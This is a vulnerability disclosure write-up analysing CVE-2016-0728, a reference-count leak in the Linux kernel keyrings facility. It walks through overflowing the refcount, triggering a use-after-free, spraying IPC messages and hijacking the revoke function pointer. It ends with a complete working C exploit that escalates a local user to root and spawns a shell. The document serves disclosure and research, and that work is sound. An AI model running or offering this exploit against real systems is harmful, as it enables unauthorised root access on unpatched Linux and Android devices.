ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

By Perception Point Research Team

Introduction

The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered it only recently, disclosed the details to the Kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither we nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.

In this write-up, we’ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided
successfully escalates privileges from a local user to root.

The Bug

CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details,
let’s cover some background required to understand the bug.

Quoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces, chiefly the keyctl syscall, are provided so that userspace programs can manage those objects and use the facility for their own purposes. (Two other syscalls, add_key and request_key, also handle keys, but keyctl is the most important one for this write-up.)

Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name), and can either assign a name to the keyring or leave it unnamed by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, execution jumps to the error2 label, which skips the call to key_put and leaks the reference that was taken by find_keyring_by_name.

	long join_session_keyring(const char *name)
	{
		...
		new = prepare_creds();
		...
		keyring = find_keyring_by_name(name, false); // find_keyring_by_name increments keyring->usage if a keyring was found
		if (PTR_ERR(keyring) == -ENOKEY) {
			/* not found - try and create a new one */
			keyring = keyring_alloc(
				name, old->uid, old->gid, old,
				KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,
				KEY_ALLOC_IN_QUOTA, NULL);
			if (IS_ERR(keyring)) {
				ret = PTR_ERR(keyring);
				goto error2;
			}
		} else if (IS_ERR(keyring)) {
			ret = PTR_ERR(keyring);
			goto error2;
		} else if (keyring == new->session_keyring) {
			ret = 0;
			goto error2; // <-- The bug is here, skips key_put.
		}

		/* we've got a keyring - now install it */
		ret = install_session_keyring_to_cred(new, keyring);
		if (ret < 0)
			goto error2;

		commit_creds(new);
		mutex_unlock(&key_session_mutex);

		ret = keyring->serial;
		key_put(keyring);
	okay:
		return ret;

	error2:
		mutex_unlock(&key_session_mutex);
	error:
		abort_creds(new);
		return ret;
	}

Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:

	/* $ gcc leak.c -o leak -lkeyutils -Wall */
	/* $ ./leak */
	/* $ cat /proc/keys */

	#include <stddef.h>
	#include <stdio.h>
	#include <sys/types.h>
	#include <keyutils.h>

	int main(int argc, const char *argv[])
	{
		int i = 0;
		key_serial_t serial;

		serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
		if (serial < 0) {
			perror("keyctl");
			return -1;
		}

		if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL) < 0) {
			perror("keyctl");
			return -1;
		}

		for (i = 0; i < 100; i++) {
			serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
			if (serial < 0) {
				perror("keyctl");
				return -1;
			}
		}

		return 0;
	}

After running it, cat /proc/keys shows leaked-keyring holding 100 references.

Exploiting the Bug

Even though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood is basically an int, meaning 32 bits wide on both 32-bit and 64-bit architectures. While every integer can theoretically overflow, this particular observation makes practical exploitation of the bug, as a way to overflow the reference count, seem feasible. And it turns out that no checks are performed to prevent the usage field from wrapping around to 0.

If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel has freed the object, it will cause the kernel to reference deallocated or reallocated memory. This way, we can achieve a use-after-free by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps won’t surprise an experienced vulnerability researcher. The outline of the steps to be executed by the exploit code is as follows:

1. Hold a (legitimate) reference to a key object
2. Overflow the same object’s usage
3. Get the keyring object freed
4. Allocate a different kernel object from user-space, with user-controlled content, over the same memory previously used by the freed keyring object
5. Use the reference to the old key object and trigger code execution

Step 1 comes straight from the manpage, and step 2 was explained earlier. Let’s dive into the technical details of the rest of the steps.

Overflowing usage Refcount

This step is actually an extension of the bug. The usage field is a 32-bit int on both 32-bit and 64-bit architectures, which means it can hold 2^32 distinct values and wraps around once it has been incremented past the last of them. To wrap the usage field around to zero, we have to run the leaking call from the snippet above on the order of 2^32 times.

Freeing keyring object

There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is to use one process to overflow the keyring usage field to 0, so that the object is freed by the garbage collection algorithm inside the keyring subsystem, which frees any keyring object the moment its usage counter is 0.

There is one caveat, though. If we look at the join_session_keyring function, prepare_creds also increments the usage of the current session keyring, and abort_creds or commit_creds decrements it again. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronously; the decrement happens later in an RCU job, which means we can overflow the usage counter without knowing it was overflowed. It is possible to solve this issue by calling sleep(1) after each call to join_session_keyring, but of course it is not feasible to sleep for 2^32 seconds. A feasible workaround is to use a variation of the divide-and-conquer approach: sleep after 2^31-1 calls, then after another 2^30-1, and so on. This way we never overflow unintentionally, because the refcount can be at most double the value it should be if no jobs were called.

Allocating and controlling kernel object

With our process pointing to a freed keyring object, we now need to allocate a kernel object that will overwrite the freed keyring object. That is easy thanks to how SLAB memory works: we allocate many objects of the keyring’s size just after the object is freed. We chose to use the Linux IPC subsystem to send messages of size 0xb8 - 0x30, where 0xb8 is the size of the keyring object and 0x30 is the size of a message header.

	if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
		perror("msgget");
		exit(1);
	}
	for (i = 0; i < 64; i++) {
		if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
			perror("msgsnd");
			exit(1);
		}
	}

This way we control the lower 0x88 bytes of the keyring object.

Gaining kernel code execution

From here it’s pretty easy, thanks to the struct key_type referenced by the keyring object, which contains many function pointers. An interesting one is the revoke function pointer, which can be invoked using the keyctl(KEYCTL_REVOKE, key) syscall. The following is the Linux kernel snippet calling the revoke function:


	void key_revoke(struct key *key)
	{
		. . .
		if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags) &&
		    key->type->revoke)
			key->type->revoke(key);
		. . .
	}

The fake keyring object must be filled in so that its uid and flags attributes pass a few control checks before execution reaches key->type->revoke. The type field should point to a user-space struct containing the function pointers, with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.

	typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
	typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

	struct key_type_s {
		void *padding[12];
		void *revoke;
	} type;

	_commit_creds commit_creds = 0xffffffff81094250;
	_prepare_kernel_cred prepare_kernel_cred = 0xffffffff81094550;

	void userspace_revoke(void * key) {
		commit_creds(prepare_kernel_cred(0));
	}

	int main(int argc, const char *argv[]) {
		...
		struct key_type * my_key_type = NULL;
		...
		my_key_type = malloc(sizeof(*my_key_type));
		my_key_type->revoke = (void*)userspace_revoke;
		...
	}

The addresses of the commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version or Android device.

Now the last step is of course:

	execl("/bin/sh", "/bin/sh", NULL);

The full exploit, which runs on a 64-bit 3.18 kernel, is reproduced at the end of this post. It takes about 30 minutes to run on an Intel Core i7-5500 CPU (time is usually not an issue in a privilege escalation exploit).

Mitigations & Conclusions

The vulnerability affects any Linux kernel version 3.8 and higher. SMEP and SMAP make it difficult to exploit, as does SELinux on Android devices. We may discuss tricks to bypass those mitigations in upcoming posts; in any case, the most important thing for now is to patch as soon as you can.

Thanks to David Howells, Wade Mealing and the whole Red Hat Security team for their fast response and their cooperation in fixing the bug.

Perception Point Research Team

Raw code:

	/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
	/* $ ./cve_2016_0728 PP_KEY */

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/types.h>
	#include <keyutils.h>
	#include <unistd.h>
	#include <time.h>
	#include <sys/ipc.h>
	#include <sys/msg.h>

	typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
	typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

	_commit_creds commit_creds;
	_prepare_kernel_cred prepare_kernel_cred;

	#define STRUCT_LEN (0xb8 - 0x30)
	#define COMMIT_CREDS_ADDR (0xffffffff81094250)
	#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)

	struct key_type {
		char * name;
		size_t datalen;
		void * vet_description;
		void * preparse;
		void * free_preparse;
		void * instantiate;
		void * update;
		void * match_preparse;
		void * match_free;
		void * revoke;
		void * destroy;
	};

	void userspace_revoke(void * key) {
		commit_creds(prepare_kernel_cred(0));
	}

	int main(int argc, const char *argv[]) {
		const char *keyring_name;
		size_t i = 0;
		unsigned long int l = 0x100000000/2;
		key_serial_t serial = -1;
		pid_t pid = -1;
		struct key_type * my_key_type = NULL;
		struct {
			long mtype;
			char mtext[STRUCT_LEN];
		} msg = {0x4141414141414141, {0}};
		int msqid;

		if (argc != 2) {
			puts("usage: ./keys <key_name>");
			return 1;
		}

		printf("uid=%d, euid=%d\n", getuid(), geteuid());
		commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
		prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;

		my_key_type = malloc(sizeof(*my_key_type));
		my_key_type->revoke = (void*)userspace_revoke;
		memset(msg.mtext, 'A', sizeof(msg.mtext));

		// key->uid
		*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
		//key->perm
		*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
		//key->type
		*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

		if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
			perror("msgget");
			exit(1);
		}

		keyring_name = argv[1];

		/* Set the new session keyring before we start */
		serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
		if (serial < 0) {
			perror("keyctl");
			return -1;
		}

		if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
			perror("keyctl");
			return -1;
		}

		puts("Increfing...");
		for (i = 1; i < 0xfffffffd; i++) {
			if (i == (0xffffffff - l)) {
				l = l/2;
				sleep(5);
			}
			if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
				perror("keyctl");
				return -1;
			}
		}
		sleep(5);

		/* here we are going to leak the last references to overflow */
		for (i=0; i<5; ++i) {
			if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
				perror("keyctl");
				return -1;
			}
		}

		puts("finished increfing");
		puts("forking...");

		/* allocate msg struct in the kernel rewriting the freed keyring object */
		for (i=0; i<64; i++) {
			pid = fork();
			if (pid == -1) {
				perror("fork");
				return -1;
			}

			if (pid == 0) {
				sleep(2);
				if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
					perror("msgget");
					exit(1);
				}
				for (i = 0; i < 64; i++) {
					if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
						perror("msgsnd");
						exit(1);
					}
				}
				sleep(-1);
				exit(1);
			}
		}

		puts("finished forking");
		sleep(5);

		/* call userspace_revoke from kernel */
		puts("calling revoke...");
		if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
			perror("keyctl_revoke");
		}

		printf("uid=%d, euid=%d\n", getuid(), geteuid());
		execl("/bin/sh", "/bin/sh", NULL);

		return 0;
	}

https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f